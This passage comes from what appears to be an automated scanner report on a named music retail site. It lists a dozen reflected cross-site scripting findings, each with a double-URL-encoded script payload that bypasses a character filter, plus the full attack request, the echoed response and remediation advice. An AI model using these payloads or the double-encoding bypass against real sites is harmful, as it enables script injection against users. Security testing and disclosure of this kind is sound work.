The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload f54bb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7667ec92db6 was submitted in the REST URL parameter 3. This input was echoed as f54bb</title><script>alert(1)</script>7667ec92db6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nativef54bb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7667ec92db6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k6a9e6o5mqq80jasm20d87n5p0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=438157992; expires=Sun, 09-Jan-2011 02:38:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=12080647; expires=Sun, 09-Jan-2011 02:38:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nativef54bb</title><script>alert(1)</script>7667ec92db6</title>
...[SNIP]...

1.219. http://www.insound.com/search/query/Natural%20Calamity&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Natural%20Calamity&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60264%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb29d7e63684 was submitted in the REST URL parameter 3. This input was echoed as 60264"><script>alert(1)</script>b29d7e63684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Natural%20Calamity60264%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb29d7e63684&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=h87m5hhjufn0871k4k3jmc9l11; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=498213488; expires=Sun, 09-Jan-2011 02:38:46 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=26066721; expires=Sun, 09-Jan-2011 02:38:46 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Natural Calamity60264"><script>alert(1)</script>b29d7e63684" />
...[SNIP]...

1.220. http://www.insound.com/search/query/Natural%20Calamity&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Natural%20Calamity&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 60aa0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eebeeb90ac7f was submitted in the REST URL parameter 3. This input was echoed as 60aa0</title><script>alert(1)</script>ebeeb90ac7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Natural%20Calamity60aa0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eebeeb90ac7f&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1cq62kefudfk9qm8hqls262mv3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=565936943; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=182793659; expires=Sun, 09-Jan-2011 02:38:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Natural Calamity60aa0</title><script>alert(1)</script>ebeeb90ac7f</title>
...[SNIP]...

1.221. http://www.insound.com/search/query/Neon%20Indian&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Neon%20Indian&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 8b33b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ce97fd2321 was submitted in the REST URL parameter 3. This input was echoed as 8b33b</title><script>alert(1)</script>0ce97fd2321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Neon%20Indian8b33b%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0ce97fd2321&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=5jjvlcroma51u47mhjdcv1giu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:59 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=321833872; expires=Sun, 09-Jan-2011 02:40:59 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=406758131; expires=Sun, 09-Jan-2011 02:40:59 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Neon Indian8b33b</title><script>alert(1)</script>0ce97fd2321</title>
...[SNIP]...

1.222. http://www.insound.com/search/query/Neon%20Indian&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Neon%20Indian&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44eac%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9c5100ddc5 was submitted in the REST URL parameter 3. This input was echoed as 44eac"><script>alert(1)</script>a9c5100ddc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Neon%20Indian44eac%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9c5100ddc5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=n49h5emv5m380rpqchh8kg2715; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:51 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=339683332; expires=Sun, 09-Jan-2011 02:40:51 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=566896223; expires=Sun, 09-Jan-2011 02:40:51 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Neon Indian44eac"><script>alert(1)</script>a9c5100ddc5" />
...[SNIP]...

1.223. http://www.insound.com/search/query/Nicki%20Minaj&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nicki%20Minaj&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b06cb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e040514512f7 was submitted in the REST URL parameter 3. This input was echoed as b06cb</title><script>alert(1)</script>040514512f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nicki%20Minajb06cb%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e040514512f7&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=i3oqnvbg8h4aqmc50pl7nl8n66; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=386220974; expires=Sun, 09-Jan-2011 02:40:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=368240184; expires=Sun, 09-Jan-2011 02:40:11 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nicki Minajb06cb</title><script>alert(1)</script>040514512f7</title>
...[SNIP]...

1.224. http://www.insound.com/search/query/Nicki%20Minaj&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nicki%20Minaj&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2554%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1674cf7956e was submitted in the REST URL parameter 3. This input was echoed as d2554"><script>alert(1)</script>1674cf7956e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nicki%20Minajd2554%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1674cf7956e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=67o6nrn18kn5arjv4dvgsrdut3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=129967594; expires=Sun, 09-Jan-2011 02:40:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=503878379; expires=Sun, 09-Jan-2011 02:40:05 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nicki Minajd2554"><script>alert(1)</script>1674cf7956e" />
...[SNIP]...

1.225. http://www.insound.com/search/query/Nico%20Muhly&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nico%20Muhly&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload f5067%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4f7f8a60ff was submitted in the REST URL parameter 3. This input was echoed as f5067</title><script>alert(1)</script>a4f7f8a60ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nico%20Muhlyf5067%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea4f7f8a60ff&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=iam57j24eqnljq28h5r4gklva0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=447931799; expires=Sun, 09-Jan-2011 02:40:38 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=558402027; expires=Sun, 09-Jan-2011 02:40:38 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nico Muhlyf5067</title><script>alert(1)</script>a4f7f8a60ff</title>
...[SNIP]...

1.226. http://www.insound.com/search/query/Nico%20Muhly&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nico%20Muhly&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53cf9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84bb1fedb4e was submitted in the REST URL parameter 3. This input was echoed as 53cf9"><script>alert(1)</script>84bb1fedb4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nico%20Muhly53cf9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84bb1fedb4e&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=l6p3cv1imqefak4ton388ihc96; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:27 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=444541201; expires=Sun, 09-Jan-2011 02:40:27 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=546877534; expires=Sun, 09-Jan-2011 02:40:27 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nico Muhly53cf9"><script>alert(1)</script>84bb1fedb4e" />
...[SNIP]...

1.227. http://www.insound.com/search/query/Nightlands&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nightlands&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8da4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efcd4cf55567 was submitted in the REST URL parameter 3. This input was echoed as c8da4"><script>alert(1)</script>fcd4cf55567 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nightlandsc8da4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efcd4cf55567&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=e3benklen2sgl53j9tvp78kdd3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=272408683; expires=Sun, 09-Jan-2011 02:40:52 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=86529911; expires=Sun, 09-Jan-2011 02:40:52 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Nightlandsc8da4"><script>alert(1)</script>fcd4cf55567" />
...[SNIP]...

1.228. http://www.insound.com/search/query/Nightlands&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nightlands&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 345a3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e329f1a03ae6 was submitted in the REST URL parameter 3. This input was echoed as 345a3</title><script>alert(1)</script>329f1a03ae6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nightlands345a3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e329f1a03ae6&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=k5ccqe5hv59hv5bomlqlr71fb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=340767090; expires=Sun, 09-Jan-2011 02:40:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=116862002; expires=Sun, 09-Jan-2011 02:40:58 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Nightlands345a3</title><script>alert(1)</script>329f1a03ae6</title>
...[SNIP]...

1.229. http://www.insound.com/search/query/Nine%20Inch%20Nails&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Nine%20Inch%20Nails&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 85401%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb09a2bfb86 was submitted in the REST URL parameter 3. This input was echoed as 85401</title><script>alert(1)</script>b09a2bfb86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Nine%20Inch%20Nails85401%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb09a2bfb86&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=djestl3vu3ai576ngidu1ui5t7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=461899030; expires=Sun, 09-Jan-2011 02:38:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=150162151; expires=Sun, 09-Jan-2011 02:38:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
